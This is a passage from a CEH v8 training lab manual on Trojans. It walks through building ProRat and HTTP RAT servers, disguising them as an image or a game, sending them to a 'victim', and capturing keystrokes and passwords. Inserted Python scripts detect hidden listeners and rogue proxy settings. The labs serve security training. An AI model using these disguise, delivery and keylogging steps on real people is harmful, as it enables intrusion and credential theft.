Ceh v8 labs module 06 trojans and backdoors
Transcript

  • 1. CEH Lab Manual: Trojans and Backdoors, Module 06
  • 2. Module 06 - Trojans and Backdoors
    Trojans and Backdoors
    A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
    ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
    Lab Scenario
    According to Bank Info Security News (http://www.bankinfosecurity.com), Trojans pose serious risks to information stored on mobile devices. Android devices are potentially at risk because the environment is open, the FBI warns. But the real problem, experts say, is the potential for any compromised device to be controlled by malicious apps, which puts the personal and sensitive information stored in mobile applications anywhere at risk of financial fraud.
    According to security experts, a Trojan known as Citadel, a variant of Zeus, is an advanced keylogger that steals banking login IDs and passwords by capturing keystrokes. Hackers then use the stolen credentials to take over online-banking accounts and schedule fraudulent transactions. This Trojan is specifically designed for financial fraud and is created and sold on the cyber black market.
    You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
    Lab Objectives
    The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
    ■ Creating a server and testing a network for attack
    ■ Detecting Trojans and backdoors
    ■ Attacking a network using sample Trojans and documenting all detected vulnerabilities and flaws
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
    Lab Environment
    To carry out this, you need:
    ■ Windows Server 2008 running as Guest-1 in a virtual machine
    ■ Windows 7 running as Guest-2 in a virtual machine
    ■ A web browser with Internet access
    ■ Administrative privileges to run tools
    CEH Lab Manual Page 425
    Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Module 06 - Trojans and Backdoors
    Lab Duration
    Time: 40 Minutes
    Overview of Trojans and Backdoors
    A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard disk. With the help of a Trojan, an attacker gets access to the stored passwords in the Trojaned computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.
    Lab Tasks
    TASK 1: Overview
    Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
    Recommended labs to assist you with Trojans and backdoors:
    ■ Creating a Server Using the ProRat Tool
    ■ Wrapping a Trojan Using One File EXE Maker
    ■ Proxy Server Trojan
    ■ HTTP Trojan
    ■ Remote Access Trojans Using Atelier Web Remote Commander
    ■ Detecting Trojans
    ■ Creating a Server Using the Theef
    ■ Creating a Server Using the Biodox
    ■ Creating a Server Using the MoSucker
    ■ Hack Windows 7 using Metasploit
    Lab Analysis
    Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
    CEH Lab Manual Page 426
  • 4. Module 06 - Trojans and Backdoors
    Lab 1: Creating a Server Using the ProRat Tool
    A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
    ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
    Lab Scenario
    As more and more people regularly use the Internet, cyber security is becoming more important for everyone, yet many people are not protecting their systems and are not informed about it. Hackers can hack your machine with malware, which means infecting your machine with malware such as viruses, worms, and Trojan horses. Hackers can also sniff your personal information, financial data, and business communication from your machine, and listen to your communication with another machine. Other hacker attacks include spoofing, mapping, hijacking, and denial-of-service attacks, which make high-profile web servers such as banks and credit card gateways unavailable for normal business. Some attackers take control of your computer and target any other computers to conduct attacks against them.
    You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
    Lab Objectives
    The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
    ■ Creating a server and testing the network for attack
    ■ Detecting Trojans and backdoors
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
    CEH Lab Manual Page 427
  • 5. Module 06 - Trojans and Backdoors
    ■ Attacking a network using sample Trojans and documenting all detected vulnerabilities and flaws
    Lab Environment
    To carry out this, you need:
    ■ ProRat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat
    ■ A computer running Windows Server 2012 as Host Machine
    ■ A computer running Windows 8 (Virtual Machine)
    ■ Windows Server 2008 running in a Virtual Machine
    ■ A web browser with Internet access
    ■ Administrative privileges to run tools
    Lab Duration
    Time: 20 Minutes
    Overview of Trojans and Backdoors
    A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
    Note: The versions of the created client or host and the appearance of the website may differ from what is shown in this lab, but the actual process of creating the server and the client is the same as shown in this lab.
    Lab Tasks
    TASK 1: Create Server with ProRat
    1. Launch the Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
    2. Double-click ProRat.exe in the Windows 8 Virtual Machine.
    3. Click Create -> Create ProRat Server to start preparing to create a server.
    CEH Lab Manual Page 428
  • 6. Module 06 - Trojans and Backdoors
    FIGURE 1.1: ProRat main window
    4. The Create Server window appears.
    FIGURE 1.2: ProRat Create Server Window (Notifications: ProConnective Notification, Mail Notification, ICQ Pager Notification, CGI Notification)
    Password button: Retrieve passwords from many services, such as POP3 accounts, messenger, IE, mail, etc.
    5. Click General Settings to change the options and features, such as Server Port, Server Password, Victim Name, or the Port Number you wish to connect to the victim over, as shown in the following screenshot.
    6. Uncheck the highlighted connection options and leave the settings default.
    CEH Lab Manual Page 429
  • 7. Module 06 - Trojans and Backdoors
    FIGURE 1.3: ProRat Create Server - General Settings (Server Port, Server Password, Victim Name, and the server's protection and invisibility options)
    Note: you can use Dynamic DNS to connect over the Internet by using no-ip account registration.
    7. Click Bind with File to bind the server with a file; in this lab we are using a .jpg file to bind the server. Check Bind server with a file.
    8. Click Select File, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\Images.
    9. Select the Girl.jpg file to bind with the server.
    Clipboard: To read data from random access memory.
    FIGURE 1.4: ProRat Binding with a file
    CEH Lab Manual Page 430
  • 8. Module 06 - Trojans and Backdoors
    10. Select Girl.jpg in the Look in: window and then click Open to bind the file.
    VNC Trojan starts a server daemon in the infected system.
    FIGURE 1.5: ProRat binding an image
    11. Click OK after selecting the image for binding with a server.
    File manager: To manage the victim directory for add, delete, and modify.
    12. In Server Extensions settings, select EXE (Has icon support) in the Select Server Extension options.
    CEH Lab Manual Page 431
  • 9. Module 06 - Trojans and Backdoors
    FIGURE 1.7: ProRat Server Extensions Settings (EXE, SCR, PIF, COM, BAT)
    Give Damage: To format the entire system files.
    13. In Server Icon settings select any of the icons, and click the Create Server button at the bottom right side of the ProRat window.
    It connects to the victim using any VNC viewer with the password "secret."
    FIGURE 1.8: ProRat creating a server
    14. Click OK after the server has been prepared, as shown in the following screenshot.
    CEH Lab Manual Page 432
  • 10. Module 06 - Trojans and Backdoors
    FIGURE 1.9: ProRat Server has been created
    15. Now you can send the created server file (in the same current directory) to the victim's machine, for example by mail or any communication media, to run.
    SHTTPD Trojan: HTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it turns a computer into an invisible web server.
    FIGURE 1.10: ProRat Create Server (Explorer view of the ProRat folder with the created binded_server file selected)
    16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.
    17. Double-click binder_server.exe as shown in the following screenshot.
    CEH Lab Manual Page 433
  • 11. Module 06 - Trojans and Backdoors
    FIGURE 1.11: ProRat in Windows Server 2008 (Explorer view of the Trojans Types folder)
    18. Now switch to the Windows 8 Virtual Machine and enter the IP address of Windows Server 2008 in the ProRat main window, leave the port number as the default, and click Connect.
    ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol that is undetectable.
    19. In this lab, the IP address of Windows Server 2008 is (10.0.0.13). Note: IP addresses might differ in classroom labs.
    FIGURE 1.12: ProRat Connecting to the Infected Server (ProRat V1.9 main window)
    20. Enter the password you provided at the time of creating the server and click OK.
    CEH Lab Manual Page 434
  • 12. Module 06 - Trojans and Backdoors
    FIGURE 1.13: ProRat connection window (Password / OK)
    21. Now you are connected to the victim machine. Click PC Info and choose the system information to test the connection, as shown in the following figure.
    Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol.
    FIGURE 1.14: ProRat connected computer window (ProRat V1.9 Connected [10.0.0.13], PC Information panel)
    TASK 2: Attack System Using Keylogger
    22. Now click KeyLogger to steal user passwords for the online system.
    FIGURE 1.15: ProRat KeyLogger button
    CEH Lab Manual Page 435
  • 13. Module 06 - Trojans and Backdoors
    23. The Key Logger window will appear.
    This Trojan works like a remote desktop access. The hacker gains complete GUI access of the remote system:
    ■ Infect the victim's computer with server.exe and plant a Reverse Connecting Trojan.
    ■ The Trojan connects from the victim's port to the attacker, establishing a reverse connection.
    ■ The attacker then has complete control over the victim's machine.
    FIGURE 1.16: ProRat KeyLogger window
    24. Now switch to Windows Server 2008 and open a browser or Notepad and type any text.
    FIGURE 1.17: Test typed in Windows Server 2008 Notepad ("Hi there This is my username: xyz@yahoo.com password: test<3@#S!@l")
    Banking Trojans are programs that steal data from infected computers via web browsers and protected storage.
    25. While the victim is writing a message or entering a user name and password, you can capture the log data.
    26. Now switch to the Windows 8 Virtual Machine and click Read Log to check for updates from the victim machine.
    CEH Lab Manual Page 436
  • 14. Module 06 - Trojans and Backdoors
    FIGURE 1.18: ProRat KeyLogger window (log received 9/23/2012 11:55:28 PM; buttons: Read Log, Delete Log, Save as, Help, Clear Screen; status: Key Log Received)
    27. Now you can read the log from the victim's machine.
    Note: ProRat Keylogger will not read special characters.
    You can use a lot of features from ProRat on the victim's machine.
    Lab Analysis
    Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
    Questions
    1. Create a server with Windows XP advanced options such as Kill AV-FW on start, disable Firewall, etc., send it and connect it to the victim machine, and examine various methods to connect to the victim machine.
    2. Evaluate and verify whether you can communicate with the victims if they are in other cities or countries.
    CEH Lab Manual Page 437
  • 15. Module 06 - Trojans and Backdoors
    Tool/Utility: ProRat
    Information Collected / Objectives Achieved:
    Successful Output: Connection of binded server.exe
    PC Information:
    Computer Name: WIN-EGBHISG14L0
    User Name: Administrator
    Windows Ver: (not shown)
    Windows Language: English (United States)
    Windows Path: c:\windows
    System Path: c:\windows\system32
    Temp Path: c:\Users\ADMINI~1
    Product ID: (not shown)
    Workgroup: NO
    Data: 9/23/2012
    Internet Connection Required: ☐ Yes ☑ No
    Platform Supported: ☑ Classroom ☐ iLabs
    CEH Lab Manual Page 438
  • 16. Module 06 - Trojans and Backdoors
    Lab 2: Wrapping a Trojan Using One File EXE Maker
    A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
    ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
    Lab Scenario
    Sometimes an attacker needs to get a backdoor into a system in order to keep access to the victim system in the future. It is a normal way for attackers to get into a system: after getting in, the attacker installs a backdoor on the victim system, and it is then easy to get into the system again. Usually a backdoor is even safer for the attacker than the normal way into a system, as it never needs the password for authentication, and many authentications make normal access harder. Backdoors can be installed using many applications, such as SSH, chat, voice messaging, or downloading and running Trojans. One way attackers use is ActiveX: a backdoor embedded in a website running ActiveX installs on the user's machine when the user visits the website, without his or her knowledge, and the attacker could then control the victim system. Another way is embedding the backdoor in layers of applications. Protecting a system from backdoors requires extensive knowledge about verifying and logging the applications running on the system and about protecting the system from attackers.
    You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
    Lab Objectives
    The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
    ■ Wrapping a Trojan with a game in Windows Server 2008
    ■ Running the Trojan to access the game on the front end
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
    CEH Lab Manual Page 439
  • 17. ■ Analyzing the Trojan running in the back end

Lab Environment

To carry out this, you need:

■ The OneFileEXEMaker tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and their appearance may differ from those in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: OneFile EXE Maker

1. Install OneFileEXEMaker on the Windows Server 2008 virtual machine.

[FIGURE 3.1: One File EXE Maker home screen (Senna Spy One EXE Maker 2000 - 2.0a). The window lists the files to join with the columns Short File Name, Parameters, Open Mode, Copy To and Action, and offers a Command Line Parameters field, an Open Mode of Normal/Maximized/Minimized/Hide, a Copy To of Windows/System/Temp/Root, an Action of Open/Execute or Copy Only, and a Pack Files? option.]
  • 18. 2. Click the Add File button, browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris, and add the Lazaris.exe file.

Note: You can set various tool options such as Open mode, Copy to, and Action.

[FIGURE 3.2: Adding the Lazaris game. LAZARIS.EXE is listed with Open Mode Hide, Copy To System and Action Open/Execute.]

3. Click Add File, browse to the CEH-Tools folder at the location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans, and add the mcafee.exe file.

[FIGURE 3.3: Adding the MCAFEE.EXE proxy server.]

4. Select Mcafee and type 8080 in the Command Line Parameters field.
  • 19. [FIGURE 3.4: Assigning port 8080 to MCAFEE. MCAFEE.EXE is listed with the parameter 8080, Open Mode Hide, Copy To System and Action Open/Execute.]

5. Select Lazaris and check the Normal option in Open Mode.

[FIGURE 3.5: Setting the Lazaris open mode. LAZARIS.EXE now shows Open Mode Normal.]

6. Click Save, browse to the desktop, and name the file Tetris.exe.
  • 20. [FIGURE 3.6: Trojan created. The Save dialog, filtered to Executables (*.exe), saves the joined file to the desktop.]

7. Now double-click the Tetris.exe file. This will launch the Lazaris game on the front end; McAfee will run in the background.

[FIGURE 3.7: Lazaris game running.]

8. Now open Task Manager and click the Processes tab to check the Lazaris game running.
  • 21. [FIGURE 3.8: MCAFEE in Task Manager. The Processes tab lists both LAZARIS.EXE and MCAFEE.EXE running under the Administrator account.]

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: One File EXE Maker
Information Collected/Objectives Achieved: Output: Using a backdoor, execute Tetris.exe

Questions

1. Use various other options of OneFileEXEMaker (the Open mode, Copy to, and Action sections) and analyze your results.
2. How will you secure your computer from One File EXE Maker attacks?
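The Task Manager check in step 8 can be scripted. The following is an added example, not part of the lab manual or of the tools it uses: it correlates a `netstat -ano` listener list with `tasklist /v` output to flag processes listening on ports outside an allowlist, which exposes a wrapped payload such as MCAFEE.EXE even when the game is all the user sees. The two snapshots embedded below are constructed samples in the format of those two commands, and the allowlist of expected ports is an assumption.

```python
"""Correlate listening TCP ports with the processes that own them.

Added example for the One File EXE Maker lab: the wrapped mcafee.exe runs
hidden behind the game, but it still owns a listening socket, so a
listener/process correlation exposes it even when nothing is on screen.
The two snapshots below are constructed sample output in the format of
`netstat -ano` and `tasklist /v /fo csv`; on a real host, capture them with
subprocess and feed the text to the same functions.
"""
import csv
import io
import re

# Constructed sample of `netstat -ano` output (not captured from the lab VM).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2812
  TCP    10.0.0.13:49200        10.0.0.1:443           ESTABLISHED     1640
"""

# Constructed sample of `tasklist /v /fo csv` output. Processes started with
# a hidden window report "N/A" as their window title.
TASKLIST_SAMPLE = '''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","724","Services","0","5,120 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:01","N/A"
"System","4","Services","0","300 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:10","N/A"
"LAZARIS.EXE","2796","Console","1","1,540 K","Running","WIN2008\\Administrator","0:00:00","Lazaris"
"MCAFEE.EXE","2812","Console","1","580 K","Running","WIN2008\\Administrator","0:00:00","N/A"
"explorer.exe","1640","Console","1","14,804 K","Running","WIN2008\\Administrator","0:00:03","Program Manager"
'''

LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.M)

# Assumed allowlist: ports the lab host is expected to serve; anything else is reported.
EXPECTED_PORTS = {135, 445}


def parse_listeners(netstat_text):
    """Return {pid: [(local_addr, port), ...]} for LISTENING TCP sockets."""
    listeners = {}
    for addr, port, pid in LISTEN_RE.findall(netstat_text):
        listeners.setdefault(int(pid), []).append((addr, int(port)))
    return listeners


def parse_tasklist(tasklist_csv):
    """Return {pid: {"image", "user", "window"}} from tasklist CSV output."""
    procs = {}
    for row in csv.DictReader(io.StringIO(tasklist_csv.strip())):
        procs[int(row["PID"])] = {
            "image": row["Image Name"],
            "user": row["User Name"],
            "window": row["Window Title"],
        }
    return procs


def unexpected_listeners(netstat_text, tasklist_csv, expected_ports=EXPECTED_PORTS):
    """Flag listening sockets on ports outside the allowlist, with owner details.

    Each finding records the image name, whether the process has a visible
    window (a hidden listener is the typical sign of a wrapped payload) and
    which user started it.
    """
    procs = parse_tasklist(tasklist_csv)
    findings = []
    for pid, sockets in parse_listeners(netstat_text).items():
        for addr, port in sockets:
            if port in expected_ports:
                continue
            info = procs.get(pid, {"image": "<unknown>", "user": "<unknown>", "window": "N/A"})
            findings.append({
                "pid": pid,
                "port": port,
                "bind": addr,
                "image": info["image"],
                "user": info["user"],
                "hidden": info["window"] == "N/A",
            })
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for f in unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {f['port']} ({f['bind']}) <- pid {f['pid']} {f['image']} "
              f"user={f['user']} hidden_window={f['hidden']}")
```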
  • 22. Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
  • 23. Lab: Proxy Server Trojan

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:

• Starting McAfee Proxy
• Accessing the Internet using McAfee Proxy

Lab Environment

To carry out this, you need:

■ The McAfee Trojan, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans
■ A computer running Windows Server 2012 (host)
■ Windows Server 2008 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Duration

Time: 20 Minutes
  • 24. Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and their appearance may differ from those in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: Proxy server - Mcafee

1. In the Windows Server 2008 virtual machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and select CmdHere from the right-click context menu.

[FIGURE 4.1: Windows Server 2008: CmdHere. Explorer shows the Trojans Types folder with the Proxy Server Trojans folder selected and its right-click context menu open.]

2. Now type the command dir to check the folder contents.

[FIGURE 4.2: Directory listing of the Proxy Server folder.]

3. The following image lists the directories and files in the folder.
  • 25. [FIGURE 4.3: Contents of the Proxy Server folder. The dir output for Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans lists mcafee.exe and one subdirectory.]

4. Type the command mcafee 8080 to run the service in Windows Server 2008.

[FIGURE 4.4: Starting the mcafee tool on port 8080.]

5. The service has started on port 8080.

6. Now go to the Windows Server 2012 host machine and configure the web browser to access the Internet on port 8080.

7. In this lab, launch Chrome and select Settings as shown in the following figure.

Note: This process can be carried out in any browser after setting the LAN settings for the respective browser.

[FIGURE 4.5: Internet option of a browser in Windows Server 2012.]
  • 26. 8. Click the Show advanced settings link to view the Internet settings.

[FIGURE 4.6: Advanced settings of the Chrome browser.]

9. In Network Settings, click Change proxy settings.

[FIGURE 4.7: Changing the proxy settings of the Chrome browser.]

10. In the Internet Properties window, click LAN settings to configure proxy settings.
  • 27. [FIGURE 4.8: LAN settings of the Chrome browser. The Internet Properties window, Connections tab, with the LAN settings button in the Local Area Network (LAN) settings section.]

11. In the Local Area Network (LAN) Settings window, select the Use a proxy server for your LAN option in the Proxy server section.

12. Enter the IP address of Windows Server 2008, set the port number to 8080, and click OK.

[FIGURE 4.9: Proxy settings of the LAN in the Chrome browser. The Proxy server section shows Address 10.0.0.13 and Port 8080.]

13. Now access any web page in the browser (example: www.bbc.co.uk).
  • 28. [FIGURE 4.10: Accessing a web page using the proxy server.]

14. The web page will open.

15. Now go back to Windows Server 2008 and check the command prompt.

[FIGURE 4.11: Background information on the proxy server. The mcafee 8080 window logs each proxied request as host:port and path (for example www.google.com:80 /complete/search?... and static.bbci.co.uk:80 /frameworks/barlesque/.../main.css), each followed by "Accepting New Requests!".]

16. You can see that we accessed the Internet using the proxy server Trojan.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
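Steps 11 and 12 write the proxy into the per-user WinINET registry values behind the LAN Settings dialog; a machine silently reconfigured the same way routes all of its browsing through the Trojan. As an added example (not from the lab manual or the tool), the script below parses those values and reports any enabled proxy that is not on an allowlist. The registry key and value names are the real WinINET ones, the sample values are constructed to match the lab's configuration, and the allowlist entry proxy.corp.example:3128 is an assumption.

```python
"""Audit the per-user WinINET proxy configuration written by the LAN Settings
dialog.

Added example for the proxy server Trojan lab. The lab turns on
"Use a proxy server for your LAN" and points it at 10.0.0.13:8080; the same
change made silently by malware sends every browser request through an
attacker-controlled host. The checks below parse the registry values behind
that dialog and report any proxy that is not on an allowlist. The key and
value names are the real ones used by WinINET on Windows; SAMPLE_VALUES is
constructed, and read_wininet_proxy() only returns data on a Windows host.
"""
import ipaddress

PROXY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"

# Constructed sample of the values under HKCU\<PROXY_KEY> after steps 11-12.
SAMPLE_VALUES = {
    "ProxyEnable": 1,
    "ProxyServer": "10.0.0.13:8080",
    "ProxyOverride": "<local>",
    "AutoConfigURL": "",
}


def parse_proxy_server(value):
    """Parse a ProxyServer value into {scheme: (host, port_or_None)}.

    WinINET accepts either a single "host:port" (applied to every scheme,
    keyed here as "all") or a per-scheme list such as
    "http=a:8080;https=b:8443;ftp=c:21;socks=d:1080".
    """
    proxies = {}
    for entry in value.split(";"):
        entry = entry.strip()
        if not entry:
            continue
        scheme, _, hostport = entry.rpartition("=")
        scheme = scheme or "all"
        host, _, port = hostport.rpartition(":")
        if not host:  # no explicit port given
            host, port = hostport, ""
        proxies[scheme] = (host, int(port) if port.isdigit() else None)
    return proxies


def audit_proxy(values, allowed_proxies):
    """Return findings for proxies that are enabled but not approved.

    values: dict of the registry values (as read_wininet_proxy returns them).
    allowed_proxies: set of approved "host:port" strings.
    """
    findings = []
    if values.get("AutoConfigURL"):
        findings.append(f"PAC script configured: {values['AutoConfigURL']}")
    if int(values.get("ProxyEnable", 0)) != 1:
        return findings
    for scheme, (host, port) in parse_proxy_server(values.get("ProxyServer", "")).items():
        target = f"{host}:{port}" if port is not None else host
        if target in allowed_proxies:
            continue
        note = "unapproved proxy"
        try:
            if ipaddress.ip_address(host).is_private:
                note = "unapproved proxy on a private address (possible LAN proxy Trojan)"
        except ValueError:
            pass  # hostname rather than an IP literal
        findings.append(f"{scheme}: {target} - {note}")
    return findings


def read_wininet_proxy():
    """Read the live values on Windows; returns {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, PROXY_KEY) as key:
        for name in ("ProxyEnable", "ProxyServer", "ProxyOverride", "AutoConfigURL"):
            try:
                values[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass  # value not present on this machine
    return values


if __name__ == "__main__":
    live = read_wininet_proxy() or SAMPLE_VALUES
    # Assumed corporate allowlist; replace with your approved proxies.
    for finding in audit_proxy(live, allowed_proxies={"proxy.corp.example:3128"}):
        print(finding)
```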
  • 29. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Proxy Server Trojan
Information Collected/Objectives Achieved: Output: Use the proxy server Trojan to access the Internet. Accessed webpage: www.bbc.co.uk

Questions

1. Determine whether the McAfee HTTP Proxy Server Trojan supports other ports apart from 8080.
2. Evaluate the drawbacks of using the HTTP proxy server Trojan to access the Internet.

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
  • 30. Lab: HTTP Trojan

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

Hackers have a variety of motives for installing malevolent software (malware). This type of software tends to yield instant access to the system and to continuously steal various types of information from it, for example, a company's strategic designs or credit card numbers. A backdoor is a program or a set of related programs that a hacker installs on the victim computer to allow access to the system at a later time. A backdoor's goal is to remove the evidence of initial entry from the system's log. Hacker-dedicated websites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log in by entering a predefined password.

You are a Security Administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:

• To run HTTP Trojan on Windows Server 2008
• Access the Windows Server 2008 machine process list using the HTTP Proxy
• Kill running processes on the Windows Server 2008 Virtual Machine

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment

To carry out this, you need:
  • 31. ■ HTTP RAT, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer running Windows Server 2008 (host)
■ Windows 8 running in a virtual machine
■ Windows Server 2008 in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and their appearance may differ from those in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

TASK 1: HTTP RAT

1. Log in to the Windows 8 virtual machine, and open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.

[FIGURE 5.1: Windows 8 Start menu.]

2. Click Services in the Start menu to launch Services.
  • 32. [FIGURE 5.2: Windows 8 Start menu Apps.]

Note: Disabling the World Wide Web Publishing service is mandatory, as HTTP RAT runs on port 80.

3. Disable/Stop the World Wide Web Publishing Service.

[FIGURE 5.3: Administrative tools - Services window, with the World Wide Web Publishing Service selected.]

4. Right-click the World Wide Web Publishing service and select Properties to disable the service.
  • 33. [FIGURE 5.4: Disable/Stop World Wide Web Publishing Service. The Properties dialog shows the service name W3SVC, the path to executable C:\Windows\system32\svchost.exe -k iissvcs, Startup type Disabled and Service status Stopped.]

5. Now start HTTP RAT from the location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

Note: The send notification option can be used to send the details to your mail ID.

[FIGURE 5.5: HTTP RAT main window (HTTP RAT 0.31). The settings include "send notification with ip address to mail", an SMTP server list, your email address, "close FireWalls", the server port (80), and Create and Exit buttons.]

6. Disable the Send notification with ip address to mail option.

7. Click Create to create an httpserver.exe file.
  • 34. [FIGURE 5.6: Create backdoor.]

Note: The created httpserver will be placed in the tool directory.

[FIGURE 5.7: Backdoor server created successfully.]

8. The httpserver.exe file should be created in the folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

9. Double-click the file and click Run.
  • 35. [FIGURE 5.8: Running the backdoor. The Open File - Security Warning dialog notes that the publisher could not be verified and that the file does not have a valid digital signature.]

10. Go to Task Manager and check if the process is running.

[FIGURE 5.9: Backdoor running in Task Manager. Httpserver (32 bit) appears under Background processes.]

